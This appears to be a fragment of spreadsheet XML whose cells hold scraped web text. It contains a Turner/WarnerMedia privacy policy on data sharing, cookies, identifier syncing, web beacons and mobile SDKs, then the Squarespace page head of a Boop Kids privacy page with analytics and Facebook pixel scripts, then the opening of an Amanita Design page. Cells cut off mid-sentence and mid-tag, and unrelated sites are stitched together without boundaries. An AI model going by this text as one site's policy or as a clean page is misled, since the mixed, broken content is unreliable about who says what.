    <t>We or a Partner may use “cookies” or similar technologies to associate certain of the Information with a unique identifier that then associates the Information with your device or browser. For information about how these technologies work and how we may use them, please go to Section IV, titled Cookies, And Other User And Ad-Targeting Technologies. Sometimes, we may associate cookies with the Information, including de-identified, “hashed,” or anonymous versions of Information you have provided (such as during registration), in order to send or help our Partners send ads and offers based on your presumed interests or demographic information.</t>
  </si>
  <si>
    <t>We may combine any of the Information we collect, for any of the above purposes, and may sometimes enhance the Information with other information that we obtain from third party sources. Please also be aware that if you choose to submit Information or content for publication (e.g., a letter to our editors, comments sent to our television personalities, a posting to a blog or a discussion board, or a video), we may publish that Information and content, along with other Information about you (such as your name, screen name or location). See our Terms of Use for details on our use of content you submit.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p8"&gt;&lt;span class="s1"&gt;&lt;br&gt; &lt;/span&gt;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="InformationSharingandDisclosure"&gt;III.</t>
  </si>
  <si>
    <t>Information Sharing and Disclosure&lt;/a&gt;&lt;/span&gt;
&lt;p class="p7"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p8"&gt;&lt;span class="s1"&gt;We may disclose the Information as follows:&lt;br&gt; &lt;/span&gt;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;strong&gt;To service providers or Partners that we have engaged to perform business-related functions on our behalf. This may include service providers that: (a) conduct research and analytics; (b) create content; (c) provide customer, technical or operational support; (d) conduct or support marketing (such as email or advertising platforms); (e) fulfill orders and user requests; (f) handle payments; (g) host our Services, forums and online communities; (h) administer contests; (i) maintain databases; (j) send or support online or mobile advertising; and (k) otherwise support our Services.&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt; In response to legal process, for example, in response to a court order or a subpoena, a law enforcement or government agency's request or similar request.&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;With third parties in order to investigate, prevent, or take action (in our sole discretion) regarding potentially illegal activities, suspected fraud, situations involving potential threats to any person, us, or the Services, or violations of our policies, the law or our Terms of Use, to verify or enforce compliance with the policies governing our Services.&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;We may transfer some or all of your Information if we, or one of our business units, undergoes a business transition, like a merger, acquisition by another company, or sale of all or part of our assets, in the unlikely event of bankruptcy, or if a substantial portion of our or of a business unit’s assets is sold or merged in this way.&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;We may share the Information with WarnerMedia companies and Turner Affiliates, so they can provide, improve and communicate with you about their own, or their marketing partners’ products and services.&amp;nbsp;&lt;/strong&gt;&lt;/span&gt;&lt;span class="s11"&gt;A list of Affiliates is available &lt;a href="https://policies.warnerbros.com/privacy/en-us/affiliates"&gt;here&lt;/a&gt;&lt;/span&gt;&lt;span class="s6"&gt;.&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;We may share the Information with unaffiliated Partners and third parties (e.g., advertisers, advertising networks and platforms, agencies, other marketers, magazine publishers, retailers, participatory databases, and non-profit organizations) that wish to market products or services to you.</t>
  </si>
  <si>
    <t>If you wish to opt out from such marketing, please visit the How to Contact Us/Opting Out of Marketing Communications Section below for further instructions.&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;We may share the Information for any other purposes disclosed to you at the time we collect the Information or pursuant to your consent.&lt;/strong&gt;&lt;/span&gt;
&lt;p class="p7"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p8"&gt;&lt;span class="s1"&gt;Please note that the Services covered by this Privacy Policy may offer content (e.g., contests, sweepstakes, promotions, games, applications, or social network integrations) that is sponsored by or co-branded with identified third parties. By virtue of these relationships, the third parties may obtain information from their visitors. We have no control over these third parties' use of this information, which is subject to their own privacy policies.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p7"&gt;&amp;nbsp;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="CookiesandOtherUserandAd-TargetingTechnologies"&gt;IV.</t>
  </si>
  <si>
    <t>Cookies and Other Online Tracking Technologies.&lt;/a&gt;&lt;/span&gt;
&lt;p class="p7"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p8"&gt;&lt;span class="s1"&gt;We use cookies and other technologies both to provide our Services to you and to advertise to you. We also may work with Partners to help them advertise to you when you visit other websites or mobile applications, and to help them perform user analytics. These technologies may also be used by our Partners to collect and analyze information about our Users’ activities on our Services and elsewhere on the Internet (including how our Users interact with advertising), and more generally, to learn more about our Users and what services or offers you might prefer to receive.</t>
  </si>
  <si>
    <t>We describe some of these technologies below.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p7"&gt;&amp;nbsp;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="Cookies"&gt;1. Cookies.&lt;/a&gt;&lt;/span&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;To enhance your online experience, we and our Partners use "cookies", "web beacons" or other tracking technologies. Cookies are text files placed in your computer's browser to store your preferences.</t>
  </si>
  <si>
    <t>We use cookies or other tracking technologies to understand Service and Internet usage and to improve or customize the products, content, offerings, services or advertisements on our Services. For example, we may use cookies to personalize your experience at our Services (e.g., to recognize you by name when you return to a Service), save your password in password-protected areas, and enable you to use shopping carts on our Services. We also may use cookies or other tracking technologies to help us offer you products, content, offerings or services that may be of interest to you and to deliver relevant advertising when you visit this Service, a Turner Affiliate’s Service, or when you visit other websites or applications.</t>
  </si>
  <si>
    <t>We or a third party platform with whom we work may place or recognize a unique cookie on your browser to enable you to receive customized content, offers, services or advertisements on our Services or other sites. The cookies may be associated with de-identified demographic or other data linked to or derived from data you voluntarily have submitted to us (e.g., your email address) that we may share with a service provider solely in hashed, non-human readable form.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p10"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;We, our third party service providers, advertisers, advertising networks and platforms, agencies, or our Partners also may use cookies or other tracking technologies to manage and measure the performance of advertisements displayed on or delivered by or through the Turner Network and/or other networks or Services. This also helps us, our service providers and Partners provide more relevant advertising.&lt;br&gt; &lt;/span&gt;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="SyncingCookiesandIdentifiers"&gt;2.</t>
  </si>
  <si>
    <t>Syncing Cookies and Identifiers.&lt;/a&gt;&lt;/span&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;We may work with our Partners (for instance, third party ad platforms) to synchronize unique, anonymous identifiers (such as those associated with cookies) in order to match our Partners’ uniquely coded user identifiers to our own. We may do this, for instance, to enhance data points about a particular unique browser or device, and thus enable us or others to send ads that are more relevant, match Users to their likely product interests, or better synchronize, cap, or optimize advertising.&lt;br&gt; &lt;/span&gt;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="LocallyStoredObjects"&gt;3. Locally Stored Objects.&lt;/a&gt;&lt;/span&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;Services on the Turner Network may employ locally stored objects (“LSOs”) and other client side storage tracking technologies in certain situations where they help to provide a better user experience, such as to remember settings, preferences and usage similar to browser cookies, or in order to target or help our Partners target ads, analyze ad performance, or perform user, website or market analytics.</t>
  </si>
  <si>
    <t>For LSOs utilized by Adobe Flash you can access Flash management tools from Adobe’s website. In addition, some, but not all browsers provide the ability to remove LSOs, sometimes within cookie and privacy settings.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p10"&gt;&amp;nbsp;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="DisablingCookies"&gt;4. Disabling Cookies&lt;/a&gt;&lt;/span&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;Most web browsers are set up to accept cookies.</t>
  </si>
  <si>
    <t>You may be able to set your browser to warn you before accepting certain cookies or to refuse certain cookies. However, if you disable the use of cookies in your web browser, some features of the Services may be difficult to use or inoperable.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p10"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;We may work with certain third-party companies that use techniques other than cookies to recognize your computer or device, link your devices, and/or to collect and record information about your web surfing activity, including those integrated with our Services. Please keep in mind that your web browser may not permit you to block the use of these techniques, and those browser settings that block conventional cookies may have no effect on such techniques.</t>
  </si>
  <si>
    <t>To learn more about Interest-Based Advertising or to opt-out of this type of advertising by those third parties that are members of DAA’s opt-out program, please go to About Ads.&lt;br&gt; &lt;/span&gt;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="WebBeacons"&gt;5. Web Beacons.&lt;/a&gt;&lt;/span&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;We and our Partners may also use "web beacons" or clear GIFs, or similar technologies, which are small pieces of code placed on a Service or in an email, to monitor the behavior and collect data about the visitors viewing a Service or email. For example, web beacons may be used to count the users who visit a web page or to deliver a cookie to the browser of a visitor viewing that Service.</t>
  </si>
  <si>
    <t>Web beacons may also be used to provide information on the effectiveness of our email campaigns (e.g., open rates, clicks, forwards, etc.).&lt;/span&gt;&lt;/p&gt;
&lt;p class="p10"&gt;&amp;nbsp;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="MobileDeviceIdentifiersandSDKs"&gt;6. Mobile Device Identifiers and SDKs.&lt;/a&gt;&lt;/span&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;We also sometimes use, or partner with publishers, publisher-facing, or app developer platforms that use mobile Software Development Kits (“SDKs”), or use an SDK with a mobile app that we offer, to collect Information, such as mobile identifiers (e.g., Apple IDFAs and Android Advertising IDs), and Information connected to how mobile devices interact with our Services and those using our Services. The SDK is a bit of computer code that app developers can include in their apps to enable ads to be shown, data to be collected, and related services or analytics to be performed.</t>
  </si>
  <si>
    <t>We may use this technology to deliver or help our Partners deliver certain advertising through mobile applications and browsers based on information associated with your mobile device. If you’d like to opt-out from having ads tailored to you in this way on your mobile device, please follow the instructions in the “Your Ad Choices” Section below.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p10"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;By visiting the Service, whether as a registered user or otherwise, you acknowledge, and agree that you are giving us your consent to track your activities and your use of the Service through the technologies described above, as well as similar technologies developed in the future, and that we may use such tracking technologies in the emails we send to you.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p10"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;Our unaffiliated Partners and third parties may themselves set and access their own tracking technologies when you visit our Services and they may have access to information about you and your online activities over time and across different websites or applications when you use the Service.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p10"&gt;&amp;nbsp;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="YourAdChoices"&gt;V. Your Ad Choices&lt;/a&gt;&lt;/span&gt;
&lt;p class="p7"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p8"&gt;&lt;span class="s1"&gt;Advertising enables us to provide the rich content for which Services on the Turner Network are known, and to provide much of this content free of cost to our Users. Thus, we may strive to provide you with ads that are relevant to you and for products you may want.</t>
  </si>
  <si>
    <t>We also offer you choices with regard to interest-based ads. To learn more about interest-based ads and the choices available to you, please visit our Ad Choices website, which has general information about certain companies that place these ads. You may also find more information about entities involved in online advertising and additional choices you may make for companies that participate in the &lt;/span&gt;&lt;span class="s2"&gt;Network Advertising Initiative</t>
  </si>
  <si>
    <t>[https://networkadvertising.org/understanding-online-advertising/what-are-my-options]&lt;/span&gt;&lt;span class="s1"&gt; (“NAI”) at the NAI choice page, and for companies that participate in &lt;/span&gt;&lt;span class="s2"&gt;the Digital Advertising Alliance [http://optout.aboutads.info/choices?c=2&amp;amp;lang=EN]&lt;/span&gt;&lt;span class="s1"&gt; (the “DAA”) at the DAA consumer choice page .</t>
  </si>
  <si>
    <t>To learn more about interest-based ads in mobile apps and to opt out of this type of advertising by third parties that participate in the DAA’s AppChoices tool, you may download the version of AppChoices for your device &lt;/span&gt;&lt;span class="s2"&gt;&lt;a href="https://youradchoices.com/appc</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US"  &gt;
  &lt;head&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"&gt;
    &lt;meta name="viewport" content="initial-scale=1"&gt;
    &lt;!-- This is Squarespace. --&gt;&lt;!--</t>
  </si>
  <si>
    <t>chimes-finch-tc4b --&gt;
&lt;base href=""&gt;
&lt;meta charset="utf-8" /&gt;
&lt;title&gt;Privacy Policy &amp;mdash; Boop Kids - Fun Games for Kids and Family&lt;/title&gt;
&lt;meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /&gt;&lt;link rel="shortcut icon" type="image/x-icon" href="https://images.squarespace-cdn.com/content/v1/5b0d9d80cef3725738f0567c/1533827094914-0R4PRLLVMTUG5B1ERMZF/favicon.ico?format=100w"/&gt;
&lt;link rel="canonical" href="https://www.boopkids.com/privacy-policy"/&gt;
&lt;meta property="og:site_name" content="Boop Kids - Fun Games for Kids and Family"/&gt;
&lt;meta property="og:title" content="Privacy Policy &amp;mdash; Boop Kids - Fun Games for Kids and Family"/&gt;
&lt;meta property="og:url" content="https://www.boopkids.com/privacy-policy"/&gt;
&lt;meta property="og:type" content="website"/&gt;
&lt;meta property="og:description" content="Boop Kids is the first kids and parenting iOS and Android app that allows parents and relatives to be in touch with kids in your family through fun videos and educational mini games for boys and girls. Great for toddlers and preschoolers.</t>
  </si>
  <si>
    <t>The app helps in the development of your child. "/&gt;
&lt;meta property="og:image" content="http://static1.squarespace.com/static/5b0d9d80cef3725738f0567c/t/5b6c4ebf8985835b3fd2c072/1533824710873/BoopKid+Fullcolor.png?format=1500w"/&gt;
&lt;meta property="og:image:width" content="503"/&gt;
&lt;meta property="og:image:height" content="374"/&gt;
&lt;meta itemprop="name" content="Privacy Policy — Boop Kids - Fun Games for Kids and Family"/&gt;
&lt;meta itemprop="url" content="https://www.boopkids.com/privacy-policy"/&gt;
&lt;meta itemprop="description" content="Boop Kids is the first kids and parenting iOS and Android app that allows parents and relatives to be in touch with kids in your family through fun videos and educational mini games for boys and girls. Great for toddlers and preschoolers.</t>
  </si>
  <si>
    <t>The app helps in the development of your child. "/&gt;
&lt;meta itemprop="thumbnailUrl" content="http://static1.squarespace.com/static/5b0d9d80cef3725738f0567c/t/5b6c4ebf8985835b3fd2c072/1533824710873/BoopKid+Fullcolor.png?format=1500w"/&gt;
&lt;link rel="image_src" href="http://static1.squarespace.com/static/5b0d9d80cef3725738f0567c/t/5b6c4ebf8985835b3fd2c072/1533824710873/BoopKid+Fullcolor.png?format=1500w" /&gt;
&lt;meta itemprop="image" content="http://static1.squarespace.com/static/5b0d9d80cef3725738f0567c/t/5b6c4ebf8985835b3fd2c072/1533824710873/BoopKid+Fullcolor.png?format=1500w"/&gt;
&lt;meta name="twitter:title" content="Privacy Policy — Boop Kids - Fun Games for Kids and Family"/&gt;
&lt;meta name="twitter:image" content="http://static1.squarespace.com/static/5b0d9d80cef3725738f0567c/t/5b6c4ebf8985835b3fd2c072/1533824710873/BoopKid+Fullcolor.png?format=1500w"/&gt;
&lt;meta name="twitter:url" content="https://www.boopkids.com/privacy-policy"/&gt;
&lt;meta name="twitter:card" content="summary"/&gt;
&lt;meta name="twitter:description" content="Boop Kids is the first kids and parenting iOS and Android app that allows parents and relatives to be in touch with kids in your family through fun videos and educational mini games for boys and girls. Great for toddlers and preschoolers.</t>
  </si>
  <si>
    <t>The app helps in the development of your child. "/&gt;
&lt;meta name="description" content="Boop Kids is the first kids and parenting iOS and Android app that allows _x005F_x000D_
parents and relatives to be in touch with kids in your family through fun _x005F_x000D_
videos and educational mini games for boys and girls. Great for toddlers _x005F_x000D_
and preschoolers.</t>
  </si>
  <si>
    <t>The app helps in the development of your child." /&gt;
&lt;link rel="preconnect" href="https://images.squarespace-cdn.com"&gt;
&lt;script type="text/javascript" src="//use.typekit.net/ik/jkVmFz-sfESNzS92mQmeSVnFUAoGHrXQ0YCIEgNJ783feGGIfFHN4UJLFRbh52jhWDmKweboZ263jhmcwDSkFQSD5ej3FQjajU74MkG0jAFu-WsoShFGZAsude80ZkoRdhXCHKoyjamTiY8Djhy8ZYmC-Ao1Oco8if37OcBDOcu8OfG0jhyTdAmDOAZTdcFGOWsRFeJ0SaBujW48Sagyjh90jhNlOfG0SaBujW48SagyjhmDjhy8ZYmC-Ao1OcFzdPUyjamTiY8Djhy8ZYmC-Ao1OcFzdPUyjamTiY8Djhy8ZYmC-Ao1Oco8ifUySkolZPUKdhN3-h8qSkoRdhXCjhyTdAmDOAZTdcFGOWsRFeJ0SaBujW48Sagyjh90jhNlOeUzjhBC-eNDifUDSWmyScmDSeBRZWFR-emqiAUTdcS0jhNlOYiaikoyjamTiY8Djhy8ZYmC-Ao1OcFzdPUaiaS0jAFu-WsoShFGZAsude80Zko0ZWbCiaiaOcBDOcu8OYiaikoKdhN3-h8qSkoRdhXCiaiaOcFG-Au8Skuc-AoR-fuXjDsKO1FUiABkZWF3jAF8OcFzdPUaiaS0SaBujW48SagyjhmDjhy8ZYmC-Ao1OcFzdPJ5jAFTZWJljcBXOAoz-WJKgcmuScN3jPGHfHRjMsMMeMb6MKG4fHToIMIjgfMfH6qJ7YqbMs6YJMJ7f6Rqy6IbMs65JMJ7f6R8y6IbMs6sJMHbMd7gRV9B.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;try{Typekit.load();}catch(e){}&lt;/script&gt;
&lt;link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/ css2?family=Baloo:wght@400&amp;family=Fredoka+One:wght@400&amp;family=Work+Sans:wght@400;500;600;700;800"&gt;
&lt;script type="text/javascript" crossorigin="anonymous" nomodule="nomodule" src="//assets.squarespace.com/@sqs/polyfiller/1.6/legacy.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" crossorigin="anonymous" src="//assets.squarespace.com/@sqs/polyfiller/1.6/modern.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;SQUARESPACE_ROLLUPS = {};&lt;/script&gt;
&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js =</t>
  </si>
  <si>
    <t>["//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-a9f9da8baa30f4eeb6612-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_runtime');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-a9f9da8baa30f4eeb6612-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_moment_js_vendor');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-cldr_resource_pack');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors_stable');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-fb8be9b2d78e372bb6e06-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-fb8be9b2d78e372bb6e06-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-10333fece8f52d23629e3-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-10333fece8f52d23629e3-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/performance-bb5721e73cd845bac5d20-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-performance');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/performance-bb5721e73cd845bac5d20-min.en-US.js" defer &gt;&lt;/script&gt;&lt;script data-name="static-context"&gt;Static = window. Static || {}; Static.SQUARESPACE_CONTEXT</t>
  </si>
  <si>
    <t>Great for toddlers and preschoolers. The app helps in the development of your child.&lt;/p&gt;","image":"//images.squarespace-cdn.com/content/v1/5b0d9d80cef3725738f0567c/1533826098847-OY5XZ2AXPW9PZT9KEV1X/BoopKid+White.png","@context":"http://schema.org","@type":"WebSite"}&lt;/script&gt;&lt;script type="application/ld+json"&gt;{"address":"","image":"https://static1.squarespace.com/static/5b0d9d80cef3725738f0567c/t/5b6c5432032be40153877d11/1680722624065/","openingHours":", , , , , , ","@context":"http://schema.org","@type":"LocalBusiness"}&lt;/script&gt;&lt;link rel="stylesheet" type="text/css" href="https://static1.squarespace.com/static/sitecss/5b0d9d80cef3725738f0567c/89/55f0aac0e4b0f0a5b7e0b22e/5b0d9d81cef3725738f05691/349/site.css"/&gt;&lt;!-- Google Tag Manager --&gt;
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KKRJHZS');&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>End Google Tag Manager --&gt;&lt;script&gt;Static. COOKIE_BANNER_CAPABLE = true;&lt;/script&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-66522835-16"&gt;&lt;/script&gt;&lt;script&gt;window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());gtag('set', 'developer_id.dZjQwMz', true);gtag('config', 'UA-66522835-16');&lt;/script&gt;&lt;script&gt;!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';n.agent='plsquarespace';n.queue=[];t=b.createElement(e);t.async=!0;t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,document,'script','https://connect.facebook.net/en_US/fbevents.js');fbq('init', '227899945628929');fbq('track', "PageView");&lt;/script&gt;&lt;!-- End of Squarespace Headers --&gt;
  &lt;/head&gt;
  &lt;body id="collection-5b6896ab8a922d0e7d3baf8b" class="tweak-social-icons-style-solid tweak-social-icons-shape-square tweak-site-width-option-full-background tweak-icon-weight-hairline  tweak-site-ajax-loading-enable tweak-site-ajax-loading-bar-show ancillary-header-top-left-layout-horizontal ancillary-header-top-center-layout-horizontal ancillary-header-top-right-layout-horizontal ancillary-header-bottom-left-layout-horizontal ancillary-header-bottom-center-layout-horizontal ancillary-header-bottom-right-layout-horizontal ancillary-header-branding-position-bottom-center ancillary-header-tagline-position-hide ancillary-header-primary-nav-position-hide ancillary-header-secondary-nav-position-hide ancillary-header-social-position-hide ancillary-header-search-position-hide ancillary-header-cart-position-hide ancillary-header-account-position-hide tweak-header-primary-nav-hover-style-spotlight tweak-header-primary-nav-button-style-solid tweak-header-primary-nav-button-shape-square tweak-header-secondary-nav-inherit-styles tweak-header-secondary-nav-hover-style-spotlight tweak-header-secondary-nav-button-style-solid tweak-header-secondary-nav-button-shape-square tweak-header-search-style-underlined tweak-header-search-placeholder-show tweak-header-cart-style-cart tweak-header-account-style-text  tweak-overlay-parallax-new-math tweak-index-nav-style-none tweak-index-nav-position-right tweak-index-nav-text-show tweak-index-page-fullscreen-all-pages  tweak-index-page-scroll-indicator-icon-only tweak-index-page-scroll-indicator-icon-arrow tweak-index-page-scroll-indicator-icon-weight-light  tweak-index-gallery-layout-packed tweak-index-gallery-spacing-sides-show tweak-index-gallery-spacing-top-bottom-show tweak-index-gallery-fixed-height tweak-index-gallery-apply-bottom-spacing tweak-index-gallery-hover-style-plain tweak-index-gallery-controls-small-arrows tweak-index-gallery-controls-icon-weight-hairline tweak-index-gallery-indicators-lines tweak-index-gallery-autoplay-enable tweak-index-gallery-transition-fade tweak-index-gallery-content-position-bottom-left tweak-index-gallery-content-text-alignment-left tweak-footer-show tweak-footer-layout-stacked tweak-footer-layout-columns-auto tweak-footer-stacked-alignment-left    ancillary-mobile-bar-branding-position-hide ancillary-mobile-bar-menu-icon-position-hide tweak-mobile-bar-menu-icon-hamburger ancillary-mobile-bar-search-icon-position-hide ancillary-mobile-bar-cart-position-hide tweak-mobile-bar-cart-style-text ancillary-mobile-bar-account-position-hide tweak-mobile-bar-account-style-text tweak-mobile-overlay-slide-origin-left tweak-mobile-overlay-close-show  tweak-mobile-overlay-menu-primary-button-style-solid tweak-mobile-overlay-menu-primary-button-shape-square tweak-mobile-overlay-menu-secondary-inherit  tweak-mobile-overlay-menu-secondary-button-style-solid tweak-mobile-overlay-menu-secondary-button-shape-square tweak-quote-block-alignment-left  tweak-blog-meta-primary-none tweak-blog-meta-secondary-date tweak-blog-list-style-grid tweak-blog-list-separator-show tweak-blog-list-alignment-left tweak-blog-list-item-image-show tweak-blog-list-item-image-aspect-ratio-grid-32-standard tweak-blog-list-item-image-aspect-ratio-stacked-11-square tweak-blog-list-item-title-show tweak-blog-list-item-excerpt-show tweak-blog-list-item-body-show tweak-blog-list-item-readmore-hide tweak-blog-list-item-meta-position-above-title tweak-blog-list-pagination-link-label-show tweak-blog-list-pagination-link-icon-show tweak-blog-list-pagination-link-icon-weight-light tweak-blog-item-alignment-center tweak-blog-item-meta-position-above-title tweak-blog-item-share-position-below-content  tweak-blog-item-pagination-link-label-show tweak-blog-item-pagination-link-title-show tweak-blog-item-pagination-link-meta-category tweak-blog-item-pagination-link-icon-weight-hairline   event-thumbnails event-thumbnail-size-32-standard event-date-label  event-list-show-cats event-list-date event-list-time event-list-address     event-excerpts  event-item-back-link    gallery-design-slideshow aspect-ratio-auto lightbox-style-dark gallery-navigation-bullets gallery-info-overlay-show-on-hover gallery-aspect-ratio-32-standard gallery-arrow-style-no-background gallery-transitions-fade gallery-show-arrows gallery-auto-crop   tweak-product-list-image-aspect-ratio-34-three-four-vertical tweak-product-list-item-hover-behavior-show-alternate-image tweak-product-list-meta-position-under tweak-product-list-mobile-meta-position-under tweak-product-list-meta-alignment-under-left tweak-product-list-meta-alignment-overlay-center-center tweak-product-list-show-title tweak-product-list-show-price tweak-product-list-filter-display-hide tweak-product-list-filter-alignment-left tweak-product-item-nav-show-breadcrumb-and-pagination tweak-product-item-nav-pagination-style-previousnext tweak-product-item-nav-breadcrumb-alignment-left tweak-product-item-nav-pagination-alignment-split tweak-product-item-gallery-position-left tweak-product-item-gallery-design-slideshow tweak-product-item-gallery-aspect-ratio-34-three-four-vertical tweak-product-item-gallery-thumbnail-alignment-left tweak-product-item-details-alignment-left tweak-product-item-details-show-title tweak-product-item-details-show-price tweak-product-item-details-show-excerpt tweak-product-item-details-excerpt-position-below-price tweak-product-i</t>
  </si>
  <si>
    <t>﻿&lt;!DOCTYPE html&gt;
&lt;!--[if lt IE 7]&gt;      &lt;html class="no-js lt-ie9 lt-ie8 lt-ie7"&gt; &lt;! [endif]--&gt;
&lt;!--[if</t>
  </si>
  <si>
    <t>IE 7]&gt;         &lt;html class="no-js lt-ie9 lt-ie8"&gt; &lt;! [endif]--&gt;
&lt;!--[if IE 8]&gt;         &lt;html class="no-js lt-ie9"&gt; &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
&lt;!--[if gt IE 8]&gt;&lt;!--&gt; &lt;html class="no-js"&gt; &lt;!--&lt;![endif]--&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="keywords" content="Amanita Design, Pilgrims, Creaks, Chuchel, Botanicula, Machinarium, Samorost 3, Samorost 2, Samorost"&gt;
&lt;meta name="description" content="Amanita Design, small independent game developing studio based in the Czech Republic"&gt;
&lt;meta name="theme-color" content="#000000"&gt;
&lt;meta name="viewport" content="width=device-width, height=device-height, initial-scale=1"&gt;
&lt;link href="favicon.ico" rel="shortcut icon"&gt;
&lt;link href="apple-touch-icon.png" rel="apple-touch-icon"&gt;
